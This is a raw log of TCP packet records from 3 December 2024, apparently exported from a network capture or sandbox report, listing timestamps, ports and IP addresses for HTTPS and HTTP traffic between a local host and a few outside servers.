                                                                                                            Dec 3, 2024 10:05:08.585834980 CET44349731151.101.1.137192.168.2.4
                                                                                                            Dec 3, 2024 10:05:08.585890055 CET49731443192.168.2.4151.101.1.137
                                                                                                            Dec 3, 2024 10:05:08.585896969 CET44349731151.101.1.137192.168.2.4
                                                                                                            Dec 3, 2024 10:05:08.585941076 CET49731443192.168.2.4151.101.1.137
                                                                                                            Dec 3, 2024 10:05:08.592735052 CET44349731151.101.1.137192.168.2.4
                                                                                                            Dec 3, 2024 10:05:08.592752934 CET44349731151.101.1.137192.168.2.4
                                                                                                            Dec 3, 2024 10:05:08.592808962 CET49731443192.168.2.4151.101.1.137
                                                                                                            Dec 3, 2024 10:05:08.592816114 CET44349731151.101.1.137192.168.2.4
                                                                                                            Dec 3, 2024 10:05:08.592854977 CET49731443192.168.2.4151.101.1.137
                                                                                                            Dec 3, 2024 10:05:08.600550890 CET44349731151.101.1.137192.168.2.4
                                                                                                            Dec 3, 2024 10:05:08.600569963 CET44349731151.101.1.137192.168.2.4
                                                                                                            Dec 3, 2024 10:05:08.600641012 CET49731443192.168.2.4151.101.1.137
                                                                                                            Dec 3, 2024 10:05:08.600646973 CET44349731151.101.1.137192.168.2.4
                                                                                                            Dec 3, 2024 10:05:08.600697994 CET49731443192.168.2.4151.101.1.137
                                                                                                            Dec 3, 2024 10:05:08.628108978 CET44349731151.101.1.137192.168.2.4
                                                                                                            Dec 3, 2024 10:05:08.628128052 CET44349731151.101.1.137192.168.2.4
                                                                                                            Dec 3, 2024 10:05:08.628247023 CET49731443192.168.2.4151.101.1.137
                                                                                                            Dec 3, 2024 10:05:08.628252983 CET44349731151.101.1.137192.168.2.4
                                                                                                            Dec 3, 2024 10:05:08.628299952 CET49731443192.168.2.4151.101.1.137
                                                                                                            Dec 3, 2024 10:05:08.765561104 CET44349731151.101.1.137192.168.2.4
                                                                                                            Dec 3, 2024 10:05:08.765583992 CET44349731151.101.1.137192.168.2.4
                                                                                                            Dec 3, 2024 10:05:08.765789986 CET49731443192.168.2.4151.101.1.137
                                                                                                            Dec 3, 2024 10:05:08.765800953 CET44349731151.101.1.137192.168.2.4
                                                                                                            Dec 3, 2024 10:05:08.765851974 CET49731443192.168.2.4151.101.1.137
                                                                                                            Dec 3, 2024 10:05:08.776654005 CET44349731151.101.1.137192.168.2.4
                                                                                                            Dec 3, 2024 10:05:08.776669979 CET44349731151.101.1.137192.168.2.4
                                                                                                            Dec 3, 2024 10:05:08.776736975 CET49731443192.168.2.4151.101.1.137
                                                                                                            Dec 3, 2024 10:05:08.776742935 CET44349731151.101.1.137192.168.2.4
                                                                                                            Dec 3, 2024 10:05:08.776900053 CET49731443192.168.2.4151.101.1.137
                                                                                                            Dec 3, 2024 10:05:08.781153917 CET44349731151.101.1.137192.168.2.4
                                                                                                            Dec 3, 2024 10:05:08.781169891 CET44349731151.101.1.137192.168.2.4
                                                                                                            Dec 3, 2024 10:05:08.781220913 CET49731443192.168.2.4151.101.1.137
                                                                                                            Dec 3, 2024 10:05:08.781225920 CET44349731151.101.1.137192.168.2.4
                                                                                                            Dec 3, 2024 10:05:08.781263113 CET49731443192.168.2.4151.101.1.137
                                                                                                            Dec 3, 2024 10:05:08.788074017 CET44349731151.101.1.137192.168.2.4
                                                                                                            Dec 3, 2024 10:05:08.788094997 CET44349731151.101.1.137192.168.2.4
                                                                                                            Dec 3, 2024 10:05:08.788167953 CET49731443192.168.2.4151.101.1.137
                                                                                                            Dec 3, 2024 10:05:08.788175106 CET44349731151.101.1.137192.168.2.4
                                                                                                            Dec 3, 2024 10:05:08.788213015 CET49731443192.168.2.4151.101.1.137
                                                                                                            Dec 3, 2024 10:05:08.795387983 CET44349731151.101.1.137192.168.2.4
                                                                                                            Dec 3, 2024 10:05:08.795409918 CET44349731151.101.1.137192.168.2.4
                                                                                                            Dec 3, 2024 10:05:08.795459032 CET49731443192.168.2.4151.101.1.137
                                                                                                            Dec 3, 2024 10:05:08.795469999 CET44349731151.101.1.137192.168.2.4
                                                                                                            Dec 3, 2024 10:05:08.795520067 CET49731443192.168.2.4151.101.1.137
                                                                                                            Dec 3, 2024 10:05:08.803311110 CET44349731151.101.1.137192.168.2.4
                                                                                                            Dec 3, 2024 10:05:08.803333998 CET44349731151.101.1.137192.168.2.4
                                                                                                            Dec 3, 2024 10:05:08.803394079 CET49731443192.168.2.4151.101.1.137
                                                                                                            Dec 3, 2024 10:05:08.803400993 CET44349731151.101.1.137192.168.2.4
                                                                                                            Dec 3, 2024 10:05:08.803447962 CET49731443192.168.2.4151.101.1.137
                                                                                                            Dec 3, 2024 10:05:08.811031103 CET44349731151.101.1.137192.168.2.4
                                                                                                            Dec 3, 2024 10:05:08.811053038 CET44349731151.101.1.137192.168.2.4
                                                                                                            Dec 3, 2024 10:05:08.811132908 CET49731443192.168.2.4151.101.1.137
                                                                                                            Dec 3, 2024 10:05:08.811140060 CET44349731151.101.1.137192.168.2.4
                                                                                                            Dec 3, 2024 10:05:08.811178923 CET49731443192.168.2.4151.101.1.137
                                                                                                            Dec 3, 2024 10:05:08.838707924 CET44349731151.101.1.137192.168.2.4
                                                                                                            Dec 3, 2024 10:05:08.838730097 CET44349731151.101.1.137192.168.2.4
                                                                                                            Dec 3, 2024 10:05:08.838820934 CET49731443192.168.2.4151.101.1.137
                                                                                                            Dec 3, 2024 10:05:08.838829994 CET44349731151.101.1.137192.168.2.4
                                                                                                            Dec 3, 2024 10:05:08.838876009 CET49731443192.168.2.4151.101.1.137
                                                                                                            Dec 3, 2024 10:05:08.976422071 CET44349731151.101.1.137192.168.2.4
                                                                                                            Dec 3, 2024 10:05:08.976453066 CET44349731151.101.1.137192.168.2.4
                                                                                                            Dec 3, 2024 10:05:08.976535082 CET49731443192.168.2.4151.101.1.137
                                                                                                            Dec 3, 2024 10:05:08.976563931 CET44349731151.101.1.137192.168.2.4
                                                                                                            Dec 3, 2024 10:05:08.976603031 CET49731443192.168.2.4151.101.1.137
                                                                                                            Dec 3, 2024 10:05:08.984215975 CET44349731151.101.1.137192.168.2.4
                                                                                                            Dec 3, 2024 10:05:08.984231949 CET44349731151.101.1.137192.168.2.4
                                                                                                            Dec 3, 2024 10:05:08.984302998 CET49731443192.168.2.4151.101.1.137
                                                                                                            Dec 3, 2024 10:05:08.984309912 CET44349731151.101.1.137192.168.2.4
                                                                                                            Dec 3, 2024 10:05:08.984323025 CET49731443192.168.2.4151.101.1.137
                                                                                                            Dec 3, 2024 10:05:08.984353065 CET49731443192.168.2.4151.101.1.137
                                                                                                            Dec 3, 2024 10:05:08.990947962 CET44349731151.101.1.137192.168.2.4
                                                                                                            Dec 3, 2024 10:05:08.990963936 CET44349731151.101.1.137192.168.2.4
                                                                                                            Dec 3, 2024 10:05:08.991014957 CET49731443192.168.2.4151.101.1.137
                                                                                                            Dec 3, 2024 10:05:08.991024017 CET44349731151.101.1.137192.168.2.4
                                                                                                            Dec 3, 2024 10:05:08.991065979 CET49731443192.168.2.4151.101.1.137
                                                                                                            Dec 3, 2024 10:05:08.998892069 CET44349731151.101.1.137192.168.2.4
                                                                                                            Dec 3, 2024 10:05:08.998915911 CET44349731151.101.1.137192.168.2.4
                                                                                                            Dec 3, 2024 10:05:08.998958111 CET49731443192.168.2.4151.101.1.137
                                                                                                            Dec 3, 2024 10:05:08.998966932 CET44349731151.101.1.137192.168.2.4
                                                                                                            Dec 3, 2024 10:05:08.998996019 CET49731443192.168.2.4151.101.1.137
                                                                                                            Dec 3, 2024 10:05:08.999018908 CET49731443192.168.2.4151.101.1.137
                                                                                                            Dec 3, 2024 10:05:09.005069971 CET44349731151.101.1.137192.168.2.4
                                                                                                            Dec 3, 2024 10:05:09.005100965 CET44349731151.101.1.137192.168.2.4
                                                                                                            Dec 3, 2024 10:05:09.005136967 CET49731443192.168.2.4151.101.1.137
                                                                                                            Dec 3, 2024 10:05:09.005142927 CET44349731151.101.1.137192.168.2.4
                                                                                                            Dec 3, 2024 10:05:09.005167007 CET49731443192.168.2.4151.101.1.137
                                                                                                            Dec 3, 2024 10:05:09.005167961 CET44349731151.101.1.137192.168.2.4
                                                                                                            Dec 3, 2024 10:05:09.005208969 CET49731443192.168.2.4151.101.1.137
                                                                                                            Dec 3, 2024 10:05:09.008208036 CET49731443192.168.2.4151.101.1.137
                                                                                                            Dec 3, 2024 10:05:20.206954956 CET4972380192.168.2.4199.232.214.172
                                                                                                            Dec 3, 2024 10:05:20.327286959 CET8049723199.232.214.172192.168.2.4
                                                                                                            Dec 3, 2024 10:05:20.327392101 CET4972380192.168.2.4199.232.214.172
                                                                                                            Dec 3, 2024 10:05:23.550065994 CET49738443192.168.2.4104.21.84.67
                                                                                                            Dec 3, 2024 10:05:23.550118923 CET44349738104.21.84.67192.168.2.4
                                                                                                            Dec 3, 2024 10:05:23.550192118 CET49738443192.168.2.4104.21.84.67
                                                                                                            Dec 3, 2024 10:05:23.550671101 CET49738443192.168.2.4104.21.84.67
                                                                                                            Dec 3, 2024 10:05:23.550684929 CET44349738104.21.84.67192.168.2.4
                                                                                                            Dec 3, 2024 10:05:24.807455063 CET44349738104.21.84.67192.168.2.4
                                                                                                            Dec 3, 2024 10:05:24.807538986 CET49738443192.168.2.4104.21.84.67
                                                                                                            Dec 3, 2024 10:05:24.811511993 CET49738443192.168.2.4104.21.84.67
                                                                                                            Dec 3, 2024 10:05:24.811520100 CET44349738104.21.84.67192.168.2.4
                                                                                                            Dec 3, 2024 10:05:24.811753035 CET44349738104.21.84.67192.168.2.4
                                                                                                            Dec 3, 2024 10:05:24.818669081 CET49738443192.168.2.4104.21.84.67
                                                                                                            Dec 3, 2024 10:05:24.863332033 CET44349738104.21.84.67192.168.2.4
                                                                                                            Dec 3, 2024 10:05:25.647942066 CET44349738104.21.84.67192.168.2.4
                                                                                                            Dec 3, 2024 10:05:25.648010015 CET44349738104.21.84.67192.168.2.4
                                                                                                            Dec 3, 2024 10:05:25.648061037 CET49738443192.168.2.4104.21.84.67
                                                                                                            Dec 3, 2024 10:05:25.648080111 CET44349738104.21.84.67192.168.2.4
                                                                                                            Dec 3, 2024 10:05:25.648091078 CET44349738104.21.84.67192.168.2.4
                                                                                                            Dec 3, 2024 10:05:25.648205996 CET49738443192.168.2.4104.21.84.67
                                                                                                            Dec 3, 2024 10:05:25.648221016 CET44349738104.21.84.67192.168.2.4
                                                                                                            Dec 3, 2024 10:05:25.656203985 CET44349738104.21.84.67192.168.2.4
                                                                                                            Dec 3, 2024 10:05:25.656256914 CET49738443192.168.2.4104.21.84.67
                                                                                                            Dec 3, 2024 10:05:25.656265020 CET44349738104.21.84.67192.168.2.4
                                                                                                            Dec 3, 2024 10:05:25.664761066 CET44349738104.21.84.67192.168.2.4
                                                                                                            Dec 3, 2024 10:05:25.664810896 CET49738443192.168.2.4104.21.84.67
                                                                                                            Dec 3, 2024 10:05:25.664819002 CET44349738104.21.84.67192.168.2.4
                                                                                                            Dec 3, 2024 10:05:25.710129976 CET49738443192.168.2.4104.21.84.67
                                                                                                            Dec 3, 2024 10:05:25.710139036 CET44349738104.21.84.67192.168.2.4
                                                                                                            Dec 3, 2024 10:05:25.756957054 CET49738443192.168.2.4104.21.84.67
                                                                                                            Dec 3, 2024 10:05:25.767966986 CET44349738104.21.84.67192.168.2.4
                                                                                                            Dec 3, 2024 10:05:25.819433928 CET49738443192.168.2.4104.21.84.67
                                                                                                            Dec 3, 2024 10:05:25.819447994 CET44349738104.21.84.67192.168.2.4
                                                                                                            Dec 3, 2024 10:05:25.849019051 CET44349738104.21.84.67192.168.2.4
                                                                                                            Dec 3, 2024 10:05:25.849066019 CET49738443192.168.2.4104.21.84.67
                                                                                                            Dec 3, 2024 10:05:25.849076033 CET44349738104.21.84.67192.168.2.4
                                                                                                            Dec 3, 2024 10:05:25.853080034 CET44349738104.21.84.67192.168.2.4
                                                                                                            Dec 3, 2024 10:05:25.853149891 CET49738443192.168.2.4104.21.84.67
                                                                                                            Dec 3, 2024 10:05:25.853157997 CET44349738104.21.84.67192.168.2.4
                                                                                                            Dec 3, 2024 10:05:25.860802889 CET44349738104.21.84.67192.168.2.4
                                                                                                            Dec 3, 2024 10:05:25.860872984 CET49738443192.168.2.4104.21.84.67
                                                                                                            Dec 3, 2024 10:05:25.860878944 CET44349738104.21.84.67192.168.2.4
                                                                                                            Dec 3, 2024 10:05:25.876323938 CET44349738104.21.84.67192.168.2.4
                                                                                                            Dec 3, 2024 10:05:25.876389980 CET49738443192.168.2.4104.21.84.67
                                                                                                            Dec 3, 2024 10:05:25.876396894 CET44349738104.21.84.67192.168.2.4
                                                                                                            Dec 3, 2024 10:05:25.884207010 CET44349738104.21.84.67192.168.2.4
                                                                                                            Dec 3, 2024 10:05:25.884249926 CET49738443192.168.2.4104.21.84.67
                                                                                                            Dec 3, 2024 10:05:25.884255886 CET44349738104.21.84.67192.168.2.4
                                                                                                            Dec 3, 2024 10:05:25.892256975 CET44349738104.21.84.67192.168.2.4
                                                                                                            Dec 3, 2024 10:05:25.892303944 CET49738443192.168.2.4104.21.84.67
                                                                                                            Dec 3, 2024 10:05:25.892317057 CET44349738104.21.84.67192.168.2.4
                                                                                                            Dec 3, 2024 10:05:25.899832010 CET44349738104.21.84.67192.168.2.4
                                                                                                            Dec 3, 2024 10:05:25.899880886 CET49738443192.168.2.4104.21.84.67
                                                                                                            Dec 3, 2024 10:05:25.899889946 CET44349738104.21.84.67192.168.2.4
                                                                                                            Dec 3, 2024 10:05:25.907736063 CET44349738104.21.84.67192.168.2.4
                                                                                                            Dec 3, 2024 10:05:25.907787085 CET49738443192.168.2.4104.21.84.67
                                                                                                            Dec 3, 2024 10:05:25.907793999 CET44349738104.21.84.67192.168.2.4
                                                                                                            Dec 3, 2024 10:05:25.914793015 CET44349738104.21.84.67192.168.2.4
                                                                                                            Dec 3, 2024 10:05:25.914855957 CET49738443192.168.2.4104.21.84.67
                                                                                                            Dec 3, 2024 10:05:25.914880037 CET44349738104.21.84.67192.168.2.4
                                                                                                            Dec 3, 2024 10:05:25.921798944 CET44349738104.21.84.67192.168.2.4
                                                                                                            Dec 3, 2024 10:05:25.921849012 CET49738443192.168.2.4104.21.84.67
                                                                                                            Dec 3, 2024 10:05:25.921858072 CET44349738104.21.84.67192.168.2.4
                                                                                                            Dec 3, 2024 10:05:25.935638905 CET44349738104.21.84.67192.168.2.4
                                                                                                            Dec 3, 2024 10:05:25.935695887 CET49738443192.168.2.4104.21.84.67
                                                                                                            Dec 3, 2024 10:05:25.935703993 CET44349738104.21.84.67192.168.2.4
                                                                                                            Dec 3, 2024 10:05:25.942722082 CET44349738104.21.84.67192.168.2.4
                                                                                                            Dec 3, 2024 10:05:25.942774057 CET49738443192.168.2.4104.21.84.67
                                                                                                            Dec 3, 2024 10:05:25.942784071 CET44349738104.21.84.67192.168.2.4
                                                                                                            Dec 3, 2024 10:05:25.991352081 CET49738443192.168.2.4104.21.84.67
                                                                                                            Dec 3, 2024 10:05:25.991359949 CET44349738104.21.84.67192.168.2.4
                                                                                                            Dec 3, 2024 10:05:26.038182974 CET49738443192.168.2.4104.21.84.67
                                                                                                            Dec 3, 2024 10:05:26.050539017 CET44349738104.21.84.67192.168.2.4
                                                                                                            Dec 3, 2024 10:05:26.052877903 CET44349738104.21.84.67192.168.2.4
                                                                                                            Dec 3, 2024 10:05:26.052918911 CET49738443192.168.2.4104.21.84.67
                                                                                                            Dec 3, 2024 10:05:26.052927971 CET44349738104.21.84.67192.168.2.4
                                                                                                            Dec 3, 2024 10:05:26.062213898 CET44349738104.21.84.67192.168.2.4
                                                                                                            Dec 3, 2024 10:05:26.062222004 CET44349738104.21.84.67192.168.2.4
                                                                                                            Dec 3, 2024 10:05:26.062280893 CET49738443192.168.2.4104.21.84.67
                                                                                                            Dec 3, 2024 10:05:26.062289000 CET44349738104.21.84.67192.168.2.4
                                                                                                            Dec 3, 2024 10:05:26.071530104 CET44349738104.21.84.67192.168.2.4
                                                                                                            Dec 3, 2024 10:05:26.071594000 CET49738443192.168.2.4104.21.84.67
                                                                                                            Dec 3, 2024 10:05:26.071604967 CET44349738104.21.84.67192.168.2.4
                                                                                                            Dec 3, 2024 10:05:26.071640968 CET49738443192.168.2.4104.21.84.67
                                                                                                            Dec 3, 2024 10:05:26.075860977 CET44349738104.21.84.67192.168.2.4
                                                                                                            Dec 3, 2024 10:05:26.080260038 CET44349738104.21.84.67192.168.2.4
                                                                                                            Dec 3, 2024 10:05:26.080310106 CET49738443192.168.2.4104.21.84.67
                                                                                                            Dec 3, 2024 10:05:26.080317020 CET44349738104.21.84.67192.168.2.4
                                                                                                            Dec 3, 2024 10:05:26.080341101 CET49738443192.168.2.4104.21.84.67
                                                                                                            Dec 3, 2024 10:05:26.089112997 CET44349738104.21.84.67192.168.2.4
                                                                                                            Dec 3, 2024 10:05:26.089123011 CET44349738104.21.84.67192.168.2.4
                                                                                                            Dec 3, 2024 10:05:26.089175940 CET49738443192.168.2.4104.21.84.67
                                                                                                            Dec 3, 2024 10:05:26.097949028 CET44349738104.21.84.67192.168.2.4
                                                                                                            Dec 3, 2024 10:05:26.097956896 CET44349738104.21.84.67192.168.2.4
                                                                                                            Dec 3, 2024 10:05:26.098000050 CET49738443192.168.2.4104.21.84.67
                                                                                                            Dec 3, 2024 10:05:26.102260113 CET44349738104.21.84.67192.168.2.4
                                                                                                            Dec 3, 2024 10:05:26.102267981 CET44349738104.21.84.67192.168.2.4
                                                                                                            Dec 3, 2024 10:05:26.102312088 CET49738443192.168.2.4104.21.84.67
                                                                                                            Dec 3, 2024 10:05:26.111006021 CET44349738104.21.84.67192.168.2.4
                                                                                                            Dec 3, 2024 10:05:26.111011982 CET44349738104.21.84.67192.168.2.4
                                                                                                            Dec 3, 2024 10:05:26.111052036 CET49738443192.168.2.4104.21.84.67
                                                                                                            Dec 3, 2024 10:05:26.119618893 CET44349738104.21.84.67192.168.2.4
                                                                                                            Dec 3, 2024 10:05:26.119707108 CET49738443192.168.2.4104.21.84.67
                                                                                                            Dec 3, 2024 10:05:26.128395081 CET44349738104.21.84.67192.168.2.4
                                                                                                            Dec 3, 2024 10:05:26.128459930 CET49738443192.168.2.4104.21.84.67
                                                                                                            Dec 3, 2024 10:05:26.132915974 CET44349738104.21.84.67192.168.2.4
                                                                                                            Dec 3, 2024 10:05:26.133205891 CET49738443192.168.2.4104.21.84.67
                                                                                                            Dec 3, 2024 10:05:26.141570091 CET44349738104.21.84.67192.168.2.4
                                                                                                            Dec 3, 2024 10:05:26.141618967 CET49738443192.168.2.4104.21.84.67
                                                                                                            Dec 3, 2024 10:05:26.253698111 CET44349738104.21.84.67192.168.2.4
                                                                                                            Dec 3, 2024 10:05:26.253772020 CET49738443192.168.2.4104.21.84.67
                                                                                                            Dec 3, 2024 10:05:26.257011890 CET44349738104.21.84.67192.168.2.4
                                                                                                            Dec 3, 2024 10:05:26.257066965 CET49738443192.168.2.4104.21.84.67
                                                                                                            Dec 3, 2024 10:05:26.263689995 CET44349738104.21.84.67192.168.2.4
                                                                                                            Dec 3, 2024 10:05:26.263756990 CET49738443192.168.2.4104.21.84.67
                                                                                                            Dec 3, 2024 10:05:26.270220041 CET44349738104.21.84.67192.168.2.4
                                                                                                            Dec 3, 2024 10:05:26.270272017 CET49738443192.168.2.4104.21.84.67
                                                                                                            Dec 3, 2024 10:05:26.273452044 CET44349738104.21.84.67192.168.2.4
                                                                                                            Dec 3, 2024 10:05:26.273500919 CET49738443192.168.2.4104.21.84.67
                                                                                                            Dec 3, 2024 10:05:26.279908895 CET44349738104.21.84.67192.168.2.4
                                                                                                            Dec 3, 2024 10:05:26.279973030 CET49738443192.168.2.4104.21.84.67
                                                                                                            Dec 3, 2024 10:05:26.286039114 CET44349738104.21.84.67192.168.2.4
                                                                                                            Dec 3, 2024 10:05:26.286083937 CET49738443192.168.2.4104.21.84.67
                                                                                                            Dec 3, 2024 10:05:26.289299011 CET44349738104.21.84.67192.168.2.4
                                                                                                            Dec 3, 2024 10:05:26.289365053 CET49738443192.168.2.4104.21.84.67
                                                                                                            Dec 3, 2024 10:05:26.295631886 CET44349738104.21.84.67192.168.2.4
                                                                                                            Dec 3, 2024 10:05:26.295681953 CET49738443192.168.2.4104.21.84.67
                                                                                                            Dec 3, 2024 10:05:26.301899910 CET44349738104.21.84.67192.168.2.4
                                                                                                            Dec 3, 2024 10:05:26.301954031 CET49738443192.168.2.4104.21.84.67
                                                                                                            Dec 3, 2024 10:05:26.305125952 CET44349738104.21.84.67192.168.2.4
                                                                                                            Dec 3, 2024 10:05:26.305172920 CET49738443192.168.2.4104.21.84.67
                                                                                                            Dec 3, 2024 10:05:26.311381102 CET44349738104.21.84.67192.168.2.4
                                                                                                            Dec 3, 2024 10:05:26.311424971 CET49738443192.168.2.4104.21.84.67
                                                                                                            Dec 3, 2024 10:05:26.317749977 CET44349738104.21.84.67192.168.2.4
                                                                                                            Dec 3, 2024 10:05:26.317800999 CET49738443192.168.2.4104.21.84.67
                                                                                                            Dec 3, 2024 10:05:26.320895910 CET44349738104.21.84.67192.168.2.4
                                                                                                            Dec 3, 2024 10:05:26.320950985 CET49738443192.168.2.4104.21.84.67
                                                                                                            Dec 3, 2024 10:05:26.328766108 CET44349738104.21.84.67192.168.2.4
                                                                                                            Dec 3, 2024 10:05:26.328833103 CET49738443192.168.2.4104.21.84.67
                                                                                                            Dec 3, 2024 10:05:26.332076073 CET44349738104.21.84.67192.168.2.4
                                                                                                            Dec 3, 2024 10:05:26.332132101 CET49738443192.168.2.4104.21.84.67
                                                                                                            Dec 3, 2024 10:05:26.338375092 CET44349738104.21.84.67192.168.2.4
                                                                                                            Dec 3, 2024 10:05:26.338428020 CET49738443192.168.2.4104.21.84.67
                                                                                                            Dec 3, 2024 10:05:26.344604015 CET44349738104.21.84.67192.168.2.4
                                                                                                            Dec 3, 2024 10:05:26.344649076 CET49738443192.168.2.4104.21.84.67
                                                                                                            Dec 3, 2024 10:05:26.347872019 CET44349738104.21.84.67192.168.2.4
                                                                                                            Dec 3, 2024 10:05:26.347914934 CET49738443192.168.2.4104.21.84.67
                                                                                                            Dec 3, 2024 10:05:26.354005098 CET44349738104.21.84.67192.168.2.4
                                                                                                            Dec 3, 2024 10:05:26.354057074 CET49738443192.168.2.4104.21.84.67
                                                                                                            Dec 3, 2024 10:05:26.360364914 CET44349738104.21.84.67192.168.2.4
                                                                                                            Dec 3, 2024 10:05:26.360413074 CET49738443192.168.2.4104.21.84.67
                                                                                                            Dec 3, 2024 10:05:26.363796949 CET44349738104.21.84.67192.168.2.4
                                                                                                            Dec 3, 2024 10:05:26.363845110 CET49738443192.168.2.4104.21.84.67
                                                                                                            Dec 3, 2024 10:05:26.369937897 CET44349738104.21.84.67192.168.2.4
                                                                                                            Dec 3, 2024 10:05:26.369985104 CET49738443192.168.2.4104.21.84.67
                                                                                                            Dec 3, 2024 10:05:26.453908920 CET44349738104.21.84.67192.168.2.4
                                                                                                            Dec 3, 2024 10:05:26.453994989 CET49738443192.168.2.4104.21.84.67
                                                                                                            Dec 3, 2024 10:05:26.459813118 CET44349738104.21.84.67192.168.2.4
                                                                                                            Dec 3, 2024 10:05:26.459867001 CET49738443192.168.2.4104.21.84.67
                                                                                                            Dec 3, 2024 10:05:26.462869883 CET44349738104.21.84.67192.168.2.4
                                                                                                            Dec 3, 2024 10:05:26.462925911 CET49738443192.168.2.4104.21.84.67
                                                                                                            Dec 3, 2024 10:05:26.468748093 CET44349738104.21.84.67192.168.2.4
                                                                                                            Dec 3, 2024 10:05:26.468800068 CET49738443192.168.2.4104.21.84.67
                                                                                                            Dec 3, 2024 10:05:26.474728107 CET44349738104.21.84.67192.168.2.4
                                                                                                            Dec 3, 2024 10:05:26.474780083 CET49738443192.168.2.4104.21.84.67
                                                                                                            Dec 3, 2024 10:05:26.490422010 CET44349738104.21.84.67192.168.2.4
                                                                                                            Dec 3, 2024 10:05:26.490434885 CET44349738104.21.84.67192.168.2.4
                                                                                                            Dec 3, 2024 10:05:26.490469933 CET44349738104.21.84.67192.168.2.4
                                                                                                            Dec 3, 2024 10:05:26.490541935 CET49738443192.168.2.4104.21.84.67
                                                                                                            Dec 3, 2024 10:05:26.490550995 CET44349738104.21.84.67192.168.2.4
                                                                                                            Dec 3, 2024 10:05:26.490573883 CET49738443192.168.2.4104.21.84.67
                                                                                                            Dec 3, 2024 10:05:26.490591049 CET49738443192.168.2.4104.21.84.67
                                                                                                            Dec 3, 2024 10:05:26.506710052 CET44349738104.21.84.67192.168.2.4
                                                                                                            Dec 3, 2024 10:05:26.506728888 CET44349738104.21.84.67192.168.2.4
                                                                                                            Dec 3, 2024 10:05:26.510097027 CET49738443192.168.2.4104.21.84.67
                                                                                                            Dec 3, 2024 10:05:26.510114908 CET44349738104.21.84.67192.168.2.4
                                                                                                            Dec 3, 2024 10:05:26.510158062 CET49738443192.168.2.4104.21.84.67
                                                                                                            Dec 3, 2024 10:05:26.519973040 CET44349738104.21.84.67192.168.2.4
                                                                                                            Dec 3, 2024 10:05:26.519994974 CET44349738104.21.84.67192.168.2.4
                                                                                                            Dec 3, 2024 10:05:26.520090103 CET49738443192.168.2.4104.21.84.67
                                                                                                            Dec 3, 2024 10:05:26.520098925 CET44349738104.21.84.67192.168.2.4
                                                                                                            Dec 3, 2024 10:05:26.520143032 CET49738443192.168.2.4104.21.84.67
                                                                                                            Dec 3, 2024 10:05:26.534553051 CET44349738104.21.84.67192.168.2.4
                                                                                                            Dec 3, 2024 10:05:26.534585953 CET44349738104.21.84.67192.168.2.4
                                                                                                            Dec 3, 2024 10:05:26.534636974 CET49738443192.168.2.4104.21.84.67
                                                                                                            Dec 3, 2024 10:05:26.534647942 CET44349738104.21.84.67192.168.2.4
                                                                                                            Dec 3, 2024 10:05:26.534674883 CET49738443192.168.2.4104.21.84.67
                                                                                                            Dec 3, 2024 10:05:26.534696102 CET49738443192.168.2.4104.21.84.67
                                                                                                            Dec 3, 2024 10:05:26.548547983 CET44349738104.21.84.67192.168.2.4
                                                                                                            Dec 3, 2024 10:05:26.548569918 CET44349738104.21.84.67192.168.2.4
                                                                                                            Dec 3, 2024 10:05:26.548623085 CET49738443192.168.2.4104.21.84.67
                                                                                                            Dec 3, 2024 10:05:26.548650026 CET44349738104.21.84.67192.168.2.4
                                                                                                            Dec 3, 2024 10:05:26.548664093 CET49738443192.168.2.4104.21.84.67
                                                                                                            Dec 3, 2024 10:05:26.548690081 CET49738443192.168.2.4104.21.84.67
                                                                                                            Dec 3, 2024 10:05:26.561551094 CET44349738104.21.84.67192.168.2.4
                                                                                                            Dec 3, 2024 10:05:26.561568975 CET44349738104.21.84.67192.168.2.4
                                                                                                            Dec 3, 2024 10:05:26.561625957 CET49738443192.168.2.4104.21.84.67
                                                                                                            Dec 3, 2024 10:05:26.561635017 CET44349738104.21.84.67192.168.2.4
                                                                                                            Dec 3, 2024 10:05:26.561675072 CET49738443192.168.2.4104.21.84.67
                                                                                                            Dec 3, 2024 10:05:26.657062054 CET44349738104.21.84.67192.168.2.4
                                                                                                            Dec 3, 2024 10:05:26.657083988 CET44349738104.21.84.67192.168.2.4
                                                                                                            Dec 3, 2024 10:05:26.657145023 CET49738443192.168.2.4104.21.84.67
                                                                                                            Dec 3, 2024 10:05:26.657161951 CET44349738104.21.84.67192.168.2.4
                                                                                                            Dec 3, 2024 10:05:26.657202005 CET49738443192.168.2.4104.21.84.67
                                                                                                            Dec 3, 2024 10:05:26.674453974 CET44349738104.21.84.67192.168.2.4
                                                                                                            Dec 3, 2024 10:05:26.674469948 CET44349738104.21.84.67192.168.2.4
                                                                                                            Dec 3, 2024 10:05:26.674532890 CET49738443192.168.2.4104.21.84.67
                                                                                                            Dec 3, 2024 10:05:26.674542904 CET44349738104.21.84.67192.168.2.4
                                                                                                            Dec 3, 2024 10:05:26.674582005 CET49738443192.168.2.4104.21.84.67
                                                                                                            Dec 3, 2024 10:05:26.685184002 CET44349738104.21.84.67192.168.2.4
                                                                                                            Dec 3, 2024 10:05:26.685199022 CET44349738104.21.84.67192.168.2.4
                                                                                                            Dec 3, 2024 10:05:26.685259104 CET49738443192.168.2.4104.21.84.67
                                                                                                            Dec 3, 2024 10:05:26.685266018 CET44349738104.21.84.67192.168.2.4
                                                                                                            Dec 3, 2024 10:05:26.685302019 CET49738443192.168.2.4104.21.84.67
                                                                                                            Dec 3, 2024 10:05:26.697874069 CET44349738104.21.84.67192.168.2.4
                                                                                                            Dec 3, 2024 10:05:26.697889090 CET44349738104.21.84.67192.168.2.4
                                                                                                            Dec 3, 2024 10:05:26.697947979 CET49738443192.168.2.4104.21.84.67
                                                                                                            Dec 3, 2024 10:05:26.697954893 CET44349738104.21.84.67192.168.2.4
                                                                                                            Dec 3, 2024 10:05:26.697992086 CET49738443192.168.2.4104.21.84.67
                                                                                                            Dec 3, 2024 10:05:26.705264091 CET44349738104.21.84.67192.168.2.4
                                                                                                            Dec 3, 2024 10:05:26.705298901 CET44349738104.21.84.67192.168.2.4
                                                                                                            Dec 3, 2024 10:05:26.705337048 CET49738443192.168.2.4104.21.84.67
                                                                                                            Dec 3, 2024 10:05:26.705343008 CET44349738104.21.84.67192.168.2.4
                                                                                                            Dec 3, 2024 10:05:26.705380917 CET49738443192.168.2.4104.21.84.67
                                                                                                            Dec 3, 2024 10:05:26.705382109 CET44349738104.21.84.67192.168.2.4
                                                                                                            Dec 3, 2024 10:05:26.705441952 CET49738443192.168.2.4104.21.84.67
                                                                                                            Dec 3, 2024 10:05:26.705841064 CET49738443192.168.2.4104.21.84.67
                                                                                                            Dec 3, 2024 10:05:55.765950918 CET49739443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:05:55.766000032 CET4434973913.107.246.63192.168.2.4
